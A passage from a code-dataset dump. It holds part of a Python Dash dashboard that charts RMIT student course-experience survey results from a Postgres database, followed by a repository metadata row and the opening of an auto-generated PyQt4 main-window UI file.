" ) crse_prg \n" \
" LEFT JOIN ( \n" \
" SELECT program_code, program_name, school_code, college \n" \
" FROM lookups.tbl_program_details \n" \
" ) pd ON (crse_prg.program_code = pd.program_code) \n" \
" LEFT JOIN ( \n" \
" SELECT sd.school_code, sd.school_name_short, sc.html \n" \
" FROM (SELECT school_code, school_name_short, colour FROM lookups.tbl_bus_school_details) sd \n" \
" LEFT JOIN (SELECT colour_name, html FROM lookups.tbl_rmit_colours) sc \n" \
" ON sc.colour_name = sd.colour \n" \
" ) bsd ON (pd.school_code=bsd.school_code)\n" \
" LEFT JOIN ( \n" \
" SELECT cd.college_code, cd.college_name, cd.college_name_short, rc.html \n" \
" FROM lookups.tbl_rmit_college_details cd, lookups.tbl_rmit_colours rc \n" \
" WHERE rc.colour_name = cd.colour \n" \
" ) col ON (pd.college = col.college_code) \n" \
" WHERE crse_prg.program_code IN {5} \n" \
" ORDER BY course_code, year, semester; \n" \
"".format(schema, tbl,
list_to_text(course_list),
start_year,
end_year,
list_to_text(program_list))
return db_extract_query_to_dataframe(qry, cur, print_messages=False)
def get_prg_ces_data(program_list, start_year, end_year, cur, tbl='vw135_program', schema='ces'):
# Returns a dataframe with CES data for courses in course list
qry = ' SELECT \n' \
" year, semester, level, \n" \
" program_code, \n" \
' population::int, reliability, \n' \
' osi_count, \n' \
' round(gts::numeric, 1) AS gts, round(gts_mean::numeric, 1) AS gts_mean, \n' \
' round(osi::numeric, 1) AS osi, round(osi_mean::numeric, 1) AS osi_mean, \n' \
' round(gts1::numeric, 1) AS gts1, round(gts2::numeric, 1) AS gts2, round(gts3::numeric, 1) AS gts3, \n' \
' round(gts4::numeric, 1) AS gts4, round(gts5::numeric, 1) AS gts5, round(gts6::numeric, 1) AS gts6 \n' \
' FROM {0}.{1} \n' \
" WHERE program_code IN {2} \n" \
" AND year >= {3} \n" \
" AND year <= {4} \n" \
" ORDER BY year, semester; \n" \
"".format(schema, tbl,
list_to_text(program_list),
start_year,
end_year)
return db_extract_query_to_dataframe(qry, cur, print_messages=False)
def get_prg_crse_data(program_list, cur):
qry = " SELECT * \n" \
" FROM programs.tbl_plan_course_structure \n" \
" WHERE program_code IN {} " \
"".format(list_to_text(program_list))
return db_extract_query_to_dataframe(qry, cur, print_messages=False)
'''-------------------------------------------- Create Dataframes -------------------------------------'''
df_prg_crse = get_prg_crse_data(program_code_test, cur=postgres_cur)
df_prg = df_prg_crse[['program_code', 'plan_code', 'program_name', 'program_level', 'school_abbr', 'campus']].drop_duplicates(['program_code', 'plan_code', 'campus', 'program_name', 'school_abr', 'program_level', 'school_abbr', 'campus'])
df_prg = df_prg.loc[df_prg['campus'] == 'AUSCY']
df_schools = df_prg[['school_abbr']].drop_duplicates()
df_crses = df_prg_crse[['course_code', 'course_name', 'ams_block_nbr', 'clist_name']].drop_duplicates()
df_crse_prg_ces = get_course_program_ces_data(df_crses['course_code'].tolist(),
df_prg['program_code'].tolist(),
start_year,
end_year,
cur=postgres_cur)
df_prg_ces = get_prg_ces_data(df_prg['program_code'].tolist(),
start_year,
end_year,
cur=postgres_cur)
df_crse_ces = get_course_ces_data(df_crses['course_code'].tolist(),
start_year,
end_year,
cur=postgres_cur)
df_crses_year = df_crses.loc[(df_crses['ams_block_nbr'] == 1)]
'''----------------------------- create dash functions -------------------------------------'''
def create_school_options():
# Create School options dropdown
df_schools.sort_values(['school_abbr'])
options = [{'label': '{0}'.format(r['school_abbr']),
'value': r['school_abbr']} for i, r in df_schools.iterrows()]
options.insert(0, {'label': 'All', 'value': None})
return options
def create_program_options(df1, school=None):
# filters course list by given school code
if school != None:
f_df = df1.loc[df1['school_abbr'] == school]
else:
f_df = df1
# Create Program options dropdown
options = [{'label': '{0}: {1}'.format(r['program_code'],
r['program_name']),
'value': r['program_code']} for i, r in f_df.sort_values(['program_code']).iterrows()]
options.insert(0, {'label': 'All', 'value': None})
return options
def make_program_level_page(program_code, level, df1_prg_ces, gts_list):
# First Page - CES quantitative data
child = [
# First Row - OSI & GTS overtime graph and CES overtime table
html.Div(
[
# OSI & GTS Graph
html.Div(
[
dcc.Graph(
id='gts-graph',
figure=line_graph_measure_surveys(
df1_prg_ces,
program_code,
['gts', 'osi'],
start_year, end_year,
semester=None,
width=540,
height=318
),
style={'margin': 0,
},
)
],
className='six columns',
style={
'width': '50%',
'margin-left': 0,
'margin-right': 0,
'border': 'solid',
}
),
# CES Table
html.Div(
children=[
dcc.Graph(
id='ces-table',
figure=generate_ces_pd_table(df1_prg_ces,
program_code,
width=530,
height=310),
style={
'margin': 0,
'margin-top': 4,
'margin-bottom': 4,
'margin-left': 10,
'margin-right': 10,
},
)
],
className='six columns',
style={
'width': '50%',
'margin': 0,
'margin-left': 0,
'margin-right': 0,
'border': 'solid',
},
),
],
className='twelve columns',
style={},
),
# Second Row - Individual GTS questions graph and CES questions list
html.Div(
[
# Individual GTS questions overtime graph
html.Div(
[
dcc.Graph(
id='gtsi-graph',
figure=line_graph_gtsq_surveys(
df1_prg_ces,
program_code,
start_year,
end_year, semester=None,
acad_career=level,
width=540,
height=318),
style={'margin': 0},
)
],
className='six columns',
style={'width': '50%',
'margin': 0,
'margin-right': 0,
'border': 'solid',
},
),
# CES question explanations
html.Div(
[
html.P([dcc.Markdown('**OSI:** {}'.format('Overall I am satisfied with the quality of this course'))],
style={'margin-top': 10,
'margin-bottom': 0,
'margin-left': 5,
'font-size': 16}),
html.P(['GTS Questions'],
style={'margin-top': 5,
'margin-bottom': 0,
'margin-left': 5,
'font-size': 16,
'font-weight': 'bold'}),
html.P(['Q1: {}'.format(gts_list[0])], style={'margin-top': 0,
'margin-bottom': 0,
'margin-left': 5,
'font-size': 16}),
html.P(['Q2: {}'.format(gts_list[1])], style={'margin-top': 0,
'margin-bottom': 0,
'margin-left': 5,
'font-size': 16}),
html.P(['Q3: {}'.format(gts_list[2])], style={'margin-top': 0,
'margin-bottom': 0,
'margin-left': 5,
'font-size': 16}),
html.P(['Q4: {}'.format(gts_list[3])], style={'margin-top': 0,
'margin-bottom': 0,
'margin-left': 5,
'font-size': 16}),
html.P(['Q5: {}'.format(gts_list[4])], style={'margin-top': 0,
'margin-bottom': 0,
'margin-left': 5,
'font-size': 16}),
html.P(['Q6: {}'.format(gts_list[5])], style={'margin-top': 0,
'margin-bottom': 0,
'margin-left': 5,
'font-size': 16}),
html.P([dcc.Markdown('{}'.format(gts_list[6]))],
style={'margin-top': 5,
'margin-left': 5,
'font-size': 16}),
],
className='six columns',
style={'width': '50%',
'margin-bottom': 0,
'margin-left': 0,
'margin-right': 0,
'font-size': 16,
'border': 'solid',
'height': 320
}
),
],
className='twelve columns',
style={
'margin-bottom': 0,
'margin-top': 0,
'margin-left': 0,
'margin-right': 0}
)
]
return child
def make_course_div(crse, course_code, program_code):
height = 330
# create 4 charts
# CRSE vs CRSE(PRG) GTS Graph
crse_div = html.Div(
[
dcc.Graph(
id='crse-gts-graph-{}'.format(course_code),
figure=line_graph_crse_prg(
df_crse_ces,
df_crse_prg_ces,
course_code,
program_code,
'gts',
start_year, end_year,
semester=None,
width=545,
height=height),
style={'margin': 0},
)
],
className='six columns',
style={'width': '50%',
'margin': 0,
'border': 'solid'
}
)
# PRG Core Courses GTS Graph
prg_crses_div = html.Div(
[
dcc.Graph(
id='crses-gts-graph-{}'.format(course_code),
figure=line_graph_prg_crses(
df_prg_ces,
df_crse_prg_ces,
course_code,
program_code,
'gts',
start_year, end_year,
semester=None,
width=545,
height=height),
style={'margin': 0},
)
],
className='six columns',
style={'width': '50%',
'margin': 0,
'border': 'solid'
}
)
# Enrolments Graph
enrol_div = html.Div(
[
dcc.Graph(
id='enrol-graph-{}'.format(course_code),
figure=line_graph_crse_prg_enrol(
df_crse_ces,
df_crse_prg_ces,
course_code,
program_code,
start_year, end_year,
semester=None,
width=545,
height=height),
style={'margin': 0,
'margin-bottom': 1,
},
)
],
className='six columns',
style={'width': '50%',
'margin': 0,
'border': 'solid'
}
)
current_div= html.Div(
[
dcc.Graph(
id='current-graph-{}'.format(course_code),
figure=line_graph_crse_prg_current(
df_prg_ces,
df_crse_ces,
df_crse_prg_ces,
course_code,
program_code,
year=2019,
semester=semester,
width=545,
height=height),
style={'margin': 0,
'margin-bottom': 1,},
)
],
className='six columns',
style={'width': '50%',
'margin': 0,
'border': 'solid'
}
)
div = html.Div(
[
# Row1
html.Div(
[
crse_div,
prg_crses_div
],
className='twelve columns ',
),
# Row2
html.Div(
[
enrol_div,
current_div
],
),
],
className='twelve columns',
)
return div
def make_program_year_level_page(program_code, year_level, limit=None):
# First Page - CES quantitative data
prg = df_prg.loc[(df_prg['program_code'] == program_code)].reset_index(drop=True)
df_crses_year = df_crses.loc[(df_crses['ams_block_nbr'] == year_level)].reset_index(drop=True)
crse_list = df_crses_year['course_code'].drop_duplicates().tolist()
if limit == None:
limit = len(crse_list)
# Course CES quantitative data
sub_div = []
for i_crse in range(0, limit):
try:
crse = df_crses_year.loc[df_crses_year['course_code'] == crse_list[i_crse]]
except:
raise
try:
temp = \
html.Div(
[
make_course_header_div(prg, crse),
make_course_div(crse, crse_list[i_crse], program_code),
],
className='twelve columns',
style={'width': '29.5cm',
'height': '20.32cm',
'top-margin': 0,
'bottom-margin': 0,
'right-margin': 50,
'left-margin': 50,
'border': 'solid'
}
)
sub_div.append(temp)
except Exception as e:
print(e, e.args)
pass
return html.Div(children=sub_div)
def make_program_pack(program_code):
# Main function that creates the Data pack for given course_code
## Note the first page header is not included as it forms part of the selection box
# filters data frames to selected course
df1_crse_prg_ces = get_program_data(df_crse_prg_ces, program_code)
df1_prg_ces = get_program_data(df_prg_ces, program_code)
df1_prg_crse = get_program_data(df_prg_crse, program_code)
try:
level = df1_prg_ces['level'].tolist()[-1]
except:
level = 'HE'
gts_list = get_gts_questions(level)
# Create year level pages
year_list = []
for year in df1_prg_crse['ams_block_nbr'].drop_duplicates().tolist():
year_list.append(make_program_year_level_page(program_code, year))
# create Data pack in correct layout
child = [
# First Page - CES quantitative data
# height short because of selector box
html.Div(
children=make_program_level_page(program_code, level, df1_prg_ces, gts_list),
className='twelve columns',
style={'width': '29.5cm',
'height': '18.6 cm',
'top-margin': 0,
'bottom-margin': 0,
'right-margin': 50,
'left-margin': 50,
'border': 'solid'
},
),
# Second Page - Additional Information
html.Div(
children=make_addtional_info(),
className='twelve columns',
style={'width': '29.5cm',
'height': '20.3cm',
'top-margin': 0,
'bottom-margin': 0,
'right-margin': 50,
'left-margin': 50,
'border': 'solid'
},
),
# Add Year Level Pages - CES data
html.Div(children=year_list),
]
return child
def make_addtional_info():
child = [
# Heading (one column)
html.Div(
[
html.P(
children=[dcc.Markdown('**Additional Information**')],
style={'fontSize': 24}
)
],
className='twelve columns',
style={'text-align': 'center'},
),
# Information (two columns)
html.Div(
className='twelve columns',
style={'margin': 0,
},
children=[
# GTS calculation explanation
html.Div(
className='six columns',
style={'width': '50%',
'margin': 0,
},
children=[
html.P(['How is the GTS (& OSI) Percent Agree calculated?'],
style={'textAlign': 'center',
'font-size': 18,
'color': rc.RMIT_Black,
'font-weight': 'bold',
'margin-bottom': 0,
'margin-top': 0,
'margin-left': 10,
'margin-right': 10},
),
html.P(['Each students can answer the OSI only once for a course.'],
style={'textAlign': 'left',
'font-size': 16,
'color': rc.RMIT_Black,
'font-weight': 'normal',
'margin-bottom': 5,
'margin-left': 10,
'margin-right': 10,
},
),
html.P(
['Each student has the option to answer the six GTS questions for every staff member in a course.'
' Hence the number of GST responses can be much higher the number of OSI responses.'],
style={'textAlign': 'left',
'font-size': 16,
'color': rc.RMIT_Black,
'font-weight': 'normal',
'margin-bottom': 5,
'margin-left': 10,
'margin-right': 10,
},
),
html.P(
[
dcc.Markdown(
'The OSI and GTS questions are measured against a 5-point scale \n'
'("1: Strongly Disagree to "5: Strongly Agree").')
],
style={'textAlign': 'left',
'font-size': 16,
'color': rc.RMIT_Black,
'font-weight': 'normal',
'margin-bottom': 0,
'margin-left': 10,
'margin-right': 10,
},
),
html.P(['The GTS percent agree is calculated by taking the sum of student responses that'
' "4: Agree" or "5: Strongly Agree" and expressing it as a percentage of all GTS responses.'],
style={'textAlign': 'left',
'font-size': 16,
'color': rc.RMIT_Black,
'font-weight': 'normal',
'margin-bottom': 5,
'margin-left': 10,
'margin-right': 10,
},
),
html.P(['This means that a neutral response ("3: Neither Agree or Disagree") '
' is effectively counted as a did not agree.'],
style={'textAlign': 'left',
'font-size': 16,
'color': rc.RMIT_Black,
'font-weight': 'normal',
'margin-bottom': 5,
'margin-left': 10,
'margin-right': 10,
},
),
html.Img(
src='data:image/png;base64,{}'.format(ces_scale_image.decode()),
style={'height': '160px',
'width': '400px',
'align': 'middle',
'vertical-align': 'middle',
'margin-top': 10,
'margin-bottom': 10,
'margin-left': 60,
'margin-right': 0,
}
),
html.P(['The GTS and OSI range from 0 to 100%.'],
style={'textAlign': 'left',
'font-size': 16,
'color': rc.RMIT_Black,
'font-weight': 'normal',
'margin-bottom': 0,
'margin-left': 10,
'margin-right': 10,
},
),
],
),
# Chart explanations
html.Div(
className='six columns',
style={'width': '50%',
'margin-bottom': 0,
'margin-top': 0,
'margin-left': 0,
'margin-right': 0,
},
children=[
html.Div(
style={
'margin-bottom': 0,
'margin-top': 0,
'margin-left': 10,
'margin-right': 10,
},
children=[
html.P(['Course Plots'],
style={'textAlign': 'center',
'font-size': 18,
'color': rc.RMIT_Black,
'font-weight': 'bold',
'margin-bottom': 0,
'margin-top': 0,
'margin-left': 0,
'margin-right': 0},
),
html.P(
[dcc.Markdown('The following pages contain plots for every Course listed in the Program structure,'
' with GTS plots on the left and OSI plots on the right.')],
style={'textAlign': 'left',
'font-size': 16,
'color': rc.RMIT_Black,
'font-weight': 'normal',
'margin-bottom': 0,
'margin-left': 0},
),
html.P(
[dcc.Markdown('The Course(Program) scores (Red) are calculated using all student responses'
' for the Course, where the students are also enrolled in the Program.')],
style={'textAlign': 'left',
'font-size': 16,
'color': rc.RMIT_Black,
'font-weight': 'normal',
'margin-bottom': 5,
'margin-left': 0},
),
html.P(
[dcc.Markdown('The Course scores (Dark Blue) are calculated using all student responses'
' for the Course, regardless of which Program the student is enrolled in.')],
style={'textAlign': 'left',
'font-size': 16,
'color': rc.RMIT_Black,
'font-weight': 'normal',
'margin-bottom': 0,
'margin-left': 0},
),
html.P(
[dcc.Markdown(
'Compared the Course/Program and the Course lines to see how your students rate'
' this Course compared to other students enrolled in the Course.'
''.format(end_year, semester))
],
style={'textAlign': 'left',
'font-size': 16,
'color': rc.RMIT_Black,
'font-weight': 'normal',
'margin-bottom': 10,
'margin-left': 0
},
),
html.P(
[dcc.Markdown('The Program scores (Blue) are calculated using all responses'
' from any student enrolled in the Program. The responses can be from'
' any course.'
' This information is the same as display in the Program plots on Page One')],
style={'textAlign': 'left',
'font-size': 16,
'color': rc.RMIT_Black,
'font-weight': 'normal',
'margin-bottom': 0,
'margin-left': 0},
),
html.P(
[dcc.Markdown(
'Compared the Course/Program and the Program lines to see how your students rate'
' this Course compared to the rest of the Program.'
''.format(end_year, semester))
],
style={'textAlign': 'left',
'font-size': 16,
'color': rc.RMIT_Black,
'font-weight': 'normal',
'margin-bottom': 0,
'margin-left': 0
},
),
],
),
],
),
],
),
]
return child
def make_course_header_div(prg, crse):
# creates course header with pre defined logo
try:
div = html.Div(
[
# Left - Headings
html.Div(
[
# Heading
html.Div(
children='{}: {}'.format(prg.iloc[0]['program_code'],
prg.iloc[0]['program_name']),
style={'textAlign': 'left',
'font-size': 18,
'color': rc.RMIT_Black,
'font-weight': 'bold',
'padding-left': '10px',
},
),
# Sub Heading
html.Div(
[
html.P(
children='{}'.format(crse.iloc[0]['clist_name']),
style={'textAlign': 'left',
'font-size': 16,
'color': rc.RMIT_Black,
'font-weight': 'bold',
'margin-bottom': 0,
'padding-left': '20px',
},
),
html.P(
children='{}: {}'.format(crse.iloc[0]['course_code'],
crse.iloc[0]['course_name']),
style={'textAlign': 'left',
'font-size': 16,
'color': rc.RMIT_Black,
'font-weight': 'bold',
'margin-bottom': 0,
'padding-left': '30px',
},
),
],
),
],
className='six columns',
style={'width': '50%',
'top-margin': 0,
'bottom-margin': 0,
'right-margin': 0,
'left-margin': 0,
}
),
# Right - Legend
html.Div(
[
html.P(
children=['{1}({0}): The responses for {1} students enrolled in {0}'
''.format(prg.iloc[0]['program_code'], crse.iloc[0]['course_code'])
],
style={'textAlign': 'left',
'padding-left': '10px',
'font-size': 15,
'color': rc.RMIT_White,
'font-weight': 'normal',
'margin-top': 1,
'margin-bottom': 2,
'margin-left': 0,
'right-margin': 0,
'background-color': rc.RMIT_Red},
),
html.P(
children=['{0}(All): The responses for {0} students enrolled in any program'
''.format(crse.iloc[0]['course_code'])],
style={'textAlign': 'left',
'padding-left': '10px',
'font-size': 15,
'color': rc.RMIT_White,
'font-weight': 'normal',
'margin-top': 0,
'margin-bottom': 1,
'margin-left': 0,
'right-margin': 0,
'background-color': rc.RMIT_DarkBlue},
),
html.P(
children=['{0}: The responses for all courses from students enrolled in {0}'
''.format(prg.iloc[0]['program_code'])
],
style={'textAlign': 'left',
'padding-left': '10px',
'font-size': 15,
'color': rc.RMIT_White,
'font-weight': 'normal',
'margin-top': 2,
'margin-bottom': 2,
'margin-left': 0,
'right-margin': 0,
'background-color': rc.RMIT_Blue},
),
],
className='six columns',
style={
'width': '50%',
'top-margin': 0,
'bottom-margin': 0,
'margin-right': 0,
'margin-left': 0,
},
),
],
className='twelve columns',
style={'border': 'solid',
}
)
except:
div = html.Div(
[],
className='twelve columns',
style={'border': 'solid'}
)
return div
def make_header_div_selector():
# Creates first header with course and school dropdown menus
div = html.Div(
className='twelve columns',
style={'width': '29.5cm',
'border': 'solid',
'top-margin': 0,
'bottom-margin': 0,
'left-margin': 50,
'right-margin': 50
},
children=
[
# Left - Dropdown menus
html.Div(
className='six columns',
style={'width': '50%'},
children=[
# Heading
html.Div(
children='Program Pack',
style={
'textAlign': 'left',
'font-size': 18,
'color': rc.RMIT_Black,
'font-weight': 'bold',
'padding-left': '10px',
},
),
html.Div(
style={
'font-size': 14,
'color': rc.RMIT_Black,
'font-weight': 'bold',
'top-margin': 0,
'bottom-margin': 0,
'right-margin': 0
},
children=[
dcc.Dropdown(
id='program-dropdown',
options=create_program_options(df_prg),
value=None,
placeholder="Select a Program",
),
],
),
html.Div(
style={'font-size': 14,
'color': rc.RMIT_Black,
'font-weight': 'bold',
'top-margin': 0,
'bottom-margin': 0,
'right-margin': 0,
},
children=[
dcc.Dropdown(
id='school-dropdown',
options=create_school_options(),
value=None,
placeholder="Select a School"
),
],
),
],
),
# Right - Image
html.Div(
className='five columns',
style={
'width': '45%',
'align': 'middle',
'vertical-align': 'middle',
'top-margin': 0,
'bottom-margin': 0,
'right-margin': 0,
'left-margin': 0,
},
children=[
html.Img(
src='data:image/png;base64,{}'.format(logo.decode()),
style={'height': '80px',
'align': 'middle',
'vertical-align': 'middle',
'margin-top': 10,
'margin-left': 180}
),
],
),
],
)
return div
# Create app layout
app.layout = html.Div(
[
html.Link(
rel='stylesheet',
href='/static/bWLwgP.css'
),
html.Link(
rel='stylesheet',
href='/static/remove_undo.css'
),
make_header_div_selector(),
html.Div(
id='program-pack'
),
]
)
'''----------------------- Main Graph Controlled ----------------------------------'''
'''---------------------- Options updates -----------------------------'''
''' Dropdowns'''
# Update course options based on school selection
@app.callback(Output('program-dropdown', 'options'),
[Input('school-dropdown', 'value')])
def update_course_dropdown(school):
return create_program_options(df_prg, school)
# Update the data pack based on program selection
@app.callback(
Output('program-pack', 'children'),
[Input('program-dropdown', 'value')],
)
def create_page(program_code):
if program_code is None:
return []
else:
return make_program_pack(program_code)
if __name__ == '__main__':
app.run_server(port=8050, host='127.0.0.1', debug=False)
| [
"peter.ryan2@rmit.edu.au"
] | peter.ryan2@rmit.edu.au |
29df50b53bfec0285ce910afd066e2861e714291 | 99c96bd34c64110372ca83f7256f95cfd336b005 | /maincontrol/Ui_maincontrol.py | 534216990e507d624c1c72433dbfc9e4382a6ad3 | [] | no_license | logsoft/StepperSuite | 03ef601fc70cc17fc83c78036f3532df59b2702d | 6ffad74def753ed1a6f5dc681559cc16b92959d7 | refs/heads/master | 2020-03-31T08:04:41.564232 | 2012-07-05T22:16:52 | 2012-07-05T22:16:52 | 4,838,451 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 15,304 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'maincontrol.ui'
#
# Created: Thu Jul 5 01:23:40 2012
# by: PyQt4 UI code generator 4.7.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.setEnabled(True)
MainWindow.resize(1114, 719)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(219, 223, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(254, 255, 248))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(224, 231, 202))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(97, 103, 78))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(129, 138, 104))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(219, 223, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(219, 223, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(224, 231, 205))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(219, 223, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(254, 255, 248))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(224, 231, 202))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(97, 103, 78))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(129, 138, 104))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(219, 223, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(219, 223, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(224, 231, 205))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(97, 103, 78))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(219, 223, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(254, 255, 248))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(224, 231, 202))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(97, 103, 78))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(129, 138, 104))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(97, 103, 78))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(97, 103, 78))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(219, 223, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(219, 223, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(194, 207, 156))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
MainWindow.setPalette(palette)
MainWindow.setStyleSheet("background-color: rgb(219, 223, 255);")
MainWindow.setTabShape(QtGui.QTabWidget.Rounded)
MainWindow.setUnifiedTitleAndToolBarOnMac(False)
